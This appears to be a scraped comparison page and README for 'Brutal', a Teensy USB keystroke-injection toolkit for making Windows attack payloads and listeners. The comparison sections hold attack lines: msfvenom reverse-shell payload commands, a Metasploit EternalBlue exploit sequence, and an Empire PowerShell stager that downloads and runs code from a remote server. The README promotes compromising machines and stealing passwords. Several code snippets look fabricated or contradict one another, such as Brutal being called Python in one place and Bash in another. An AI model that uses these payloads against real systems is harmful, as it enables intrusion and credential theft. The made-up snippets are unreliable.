Brutal
Payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy . Brutal is a toolkit to quickly create various payload,powershell attack , virus attack and launch listener for a Human Interface Device ( Payload Teensy )
Top Related Projects
Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
Metasploit Framework
A proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.
An asynchronous, collaborative post-exploitation agent powered by Python and .NET's DLR
Covenant is a collaborative .NET C2 framework for red teamers.
Empire is a PowerShell and Python post-exploitation agent.
Quick Overview
Brutal is a toolkit for penetration testing and security research, focusing on creating and managing remote access trojans (RATs) and payloads. It provides a framework for generating, obfuscating, and deploying various types of malware for educational and authorized testing purposes.
Pros
- Comprehensive suite of tools for creating and managing RATs
- Supports multiple platforms and programming languages
- Includes obfuscation techniques to evade detection
- Actively maintained and regularly updated
Cons
- Can be misused for malicious purposes if not handled responsibly
- Requires advanced knowledge of security concepts and programming
- May trigger antivirus software during legitimate testing
- Legal and ethical considerations must be carefully addressed before use
Getting Started
-
Clone the repository:
git clone https://github.com/screetsec/Brutal.git
-
Navigate to the Brutal directory:
cd Brutal
-
Install dependencies:
sudo chmod +x install.sh sudo ./install.sh
-
Run Brutal:
sudo python3 Brutal.py
Note: Always ensure you have proper authorization and are complying with all applicable laws and regulations before using this tool. Use responsibly and only in controlled, authorized environments.
Competitor Comparisons
Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
Pros of Unicorn
- Focused specifically on PowerShell payload generation
- Lightweight and easy to use
- Actively maintained with frequent updates
Cons of Unicorn
- Limited to PowerShell-based payloads
- Fewer customization options compared to Brutal
- Less comprehensive toolkit for overall penetration testing
Code Comparison
Unicorn (payload generation):
payload = "powershell -window hidden -enc {0}".format(base64.b64encode(unicode(powershell_code).encode('utf-16le')))
Brutal (payload generation):
payload = "msfvenom -p {0} LHOST={1} LPORT={2} -f {3} > {4}".format(payload, lhost, lport, format, output)
Summary
Unicorn is a specialized tool for generating PowerShell-based payloads, offering simplicity and ease of use. It's actively maintained but has a narrower focus compared to Brutal.
Brutal, on the other hand, provides a more comprehensive toolkit for penetration testing, including various payload types and additional features. However, it may have a steeper learning curve and require more setup.
The choice between the two depends on the specific needs of the user, with Unicorn being ideal for quick PowerShell payload generation and Brutal offering a broader range of penetration testing capabilities.
Metasploit Framework
Pros of Metasploit Framework
- Extensive library of exploits and modules
- Active community and regular updates
- Robust documentation and support
Cons of Metasploit Framework
- Steeper learning curve for beginners
- Larger resource footprint
- More complex setup and configuration
Code Comparison
Brutal (payload generation):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > payload.exe
Metasploit Framework (exploit usage):
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target_ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <attacker_ip>
exploit
Brutal focuses on simplifying payload generation and social engineering attacks, while Metasploit Framework offers a more comprehensive suite of penetration testing tools. Brutal is more accessible for beginners, but Metasploit provides greater depth and flexibility for advanced users. Both tools serve different purposes within the security testing ecosystem, with Brutal emphasizing ease of use and Metasploit offering a broader range of capabilities.
A proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.
Pros of PoshC2
- More focused on PowerShell-based post-exploitation and C2 functionality
- Actively maintained with regular updates and community support
- Extensive documentation and usage guides available
Cons of PoshC2
- Limited cross-platform support compared to Brutal's multi-OS capabilities
- Steeper learning curve for users not familiar with PowerShell
- Less emphasis on initial access and social engineering techniques
Code Comparison
PoshC2 (PowerShell-based command execution):
Invoke-PoshCommand -Command "Get-Process" -ComputerName $target
Brutal (Python-based payload generation):
payload = Payload("windows/meterpreter/reverse_tcp", lhost="192.168.1.100", lport=4444)
Summary
PoshC2 excels in PowerShell-based post-exploitation and command and control, offering a more specialized toolset for Windows environments. It benefits from active development and comprehensive documentation. However, it may be less accessible to users without PowerShell expertise and has limited cross-platform functionality.
Brutal, on the other hand, provides a broader range of attack vectors and social engineering tools, with support for multiple operating systems. Its Python-based approach may be more familiar to a wider audience, but it lacks the depth of PowerShell-specific features found in PoshC2.
Choose PoshC2 for advanced Windows-focused operations, or Brutal for a more versatile, multi-platform approach to penetration testing and social engineering.
An asynchronous, collaborative post-exploitation agent powered by Python and .NET's DLR
Pros of SILENTTRINITY
- Written in Python, offering better cross-platform compatibility
- Utilizes modern post-exploitation techniques and evasion methods
- Supports multiple communication protocols (HTTP/S, DNS, SMB)
Cons of SILENTTRINITY
- Less user-friendly for beginners compared to Brutal's simpler interface
- Requires more setup and configuration
- Smaller community and fewer resources available for support
Code Comparison
SILENTTRINITY (Python):
from silenttrinity import SilentTrinity
st = SilentTrinity()
st.start_teamserver()
st.connect_client()
st.execute_module("shell", "whoami")
Brutal (Bash):
#!/bin/bash
source brutal.sh
start_listener
generate_payload
execute_command "whoami"
Both tools are designed for post-exploitation and penetration testing, but SILENTTRINITY offers more advanced features and flexibility at the cost of complexity. Brutal, on the other hand, provides a simpler approach with its bash-based scripting, making it more accessible for users familiar with Linux environments. The choice between the two depends on the user's specific needs, skill level, and target environment.
Covenant is a collaborative .NET C2 framework for red teamers.
Pros of Covenant
- More advanced and feature-rich C2 framework
- Utilizes .NET Core for cross-platform compatibility
- Offers a graphical user interface for easier management
Cons of Covenant
- Steeper learning curve due to complexity
- Requires more resources to run effectively
- Less focused on social engineering techniques
Code Comparison
Covenant (C#):
public class Grunt : IMessenger
{
public string Name { get; set; }
public string Guid { get; set; }
public GruntStatus Status { get; set; }
}
Brutal (Python):
class Brutal:
def __init__(self):
self.name = "Brutal"
self.version = "1.0"
self.description = "Payload Generator for Penetration Testing"
Covenant is a more comprehensive C2 framework written in C#, offering advanced features and a GUI. It's cross-platform but requires more resources and has a steeper learning curve. Brutal, on the other hand, is a simpler Python-based tool focused on payload generation and social engineering. While Covenant provides a full-fledged C2 infrastructure, Brutal excels in quick payload creation for specific scenarios. The code comparison shows Covenant's object-oriented approach for managing "Grunts" (agents), while Brutal's code demonstrates its straightforward structure for payload generation.
Empire is a PowerShell and Python post-exploitation agent.
Pros of Empire
- More comprehensive and feature-rich post-exploitation framework
- Actively maintained with regular updates and community support
- Supports a wider range of operating systems and attack vectors
Cons of Empire
- Steeper learning curve due to its complexity
- Larger codebase, potentially making it harder to customize or modify
- May be more easily detected by antivirus software due to its popularity
Code Comparison
Empire (PowerShell stager):
$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;
IEX $wc.DownloadString('http://empire.server/launcher');
Brutal (Metasploit payload generation):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > payload.exe
Both repositories are powerful post-exploitation frameworks, but they differ in scope and complexity. Empire is more comprehensive and versatile, while Brutal focuses on simplicity and ease of use for specific attack scenarios. Empire's codebase is more extensive, offering a wider range of features but requiring more time to master. Brutal, on the other hand, provides a more straightforward approach to payload generation and exploitation, making it easier for beginners to use but potentially limiting its capabilities in complex scenarios.
Convert designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual CopilotREADME
Now Teensy can be use for penetration
Teensy like a rubber ducky , why im choose teensy ? because the price very cheap for me . tâs extremely useful for executing scripts on a target machine without the need for human-to-keyboard interaction ( HID -ATTACK ) .When you insert the device, it will be detected as a keyboard, and using the microprocessor and onboard flash memory storage, you can send a very fast set of keystrokes to the targetâs machine and completely compromise it, regardless of autorun. Iâve used it in my security testing to run recon or enumeration scripts, execute reverse shells, exploit local DLL hijack/privilege escalation vulnerabilities, and get all password . Now im develop new tools the name is Brutal
Brutal
Brutal is a toolkit to quickly create various payload,powershell attack , virus attack and launch listener for a Human Interface Device
Donate
- If this project very help you to penetration testing and u want support me , you can give me a cup of coffee :)
Screenshoot
Video
-
Check this video https://www.youtube.com/watch?v=WaqY-pQpuV0
-
Do you want like a mr robot hacking scene when Angela moss plug usb into computer for get credential information ? you can choose payload in brutal ( optional 3 or 4 )
The Goal
-
Generate various payload and powershell attack without coding
-
To help breaking computer very fast and agile :p
-
The Payloads Compatibility > target Windows machines only
Requirements
-
Arduino Software ( I used v1.6.7 )
-
TeensyDuino
-
Linux udev rules
-
How install all requirements ? Visit This Wiki
Supported Hardware
The following hardware has been tested and is known to work.
-
Teensy 3.x
-
Usb Cable
:scroll: Changelog
Be sure to check out the [Changelog] and Read CHANGELOG.md
Getting Started
Copy and paste the PaensyLib folder inside your Arduino\libraries
git clone https://github.com/Screetsec/Brutal.git
cd Brutal
chmod +x Brutal.sh
sudo ./Brutal.sh or sudo su ./Brutal.sh
BUG ?
- Submit new issue
- Contact me
- Hey sup ? do you want ask about all my tools ? you can join me in telegram.me/offscreetsec
Donations
-
Donation: Send to bitcoin
-
Addres Bitcoin : 1NuNTXo7Aato7XguFkvwYnTAFV2immXmjS
:octocat: Credits
- Thanks to allah and Screetsec [ Edo -maland- ]
- Dracos Linux from Scratch Indonesia ( Awesome Penetration os ), you can see in http://dracos-linux.org/
- Offensive Security for the awesome OS ( http://www.offensive-security.com/ )
- http://www.kali.org/
- Jack Wilder admin in http://www.linuxsec.org
- And another open sources tool in github
- Uptodate new tools hacking visit http://www.kitploit.com
Disclaimer
Note: modifications, changes, or alterations to this sourcecode is acceptable, however,any public releases utilizing this code must be approved by writen this tool ( Edo -m- ).
Top Related Projects
Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
Metasploit Framework
A proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.
An asynchronous, collaborative post-exploitation agent powered by Python and .NET's DLR
Covenant is a collaborative .NET C2 framework for red teamers.
Empire is a PowerShell and Python post-exploitation agent.
Convert designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual Copilot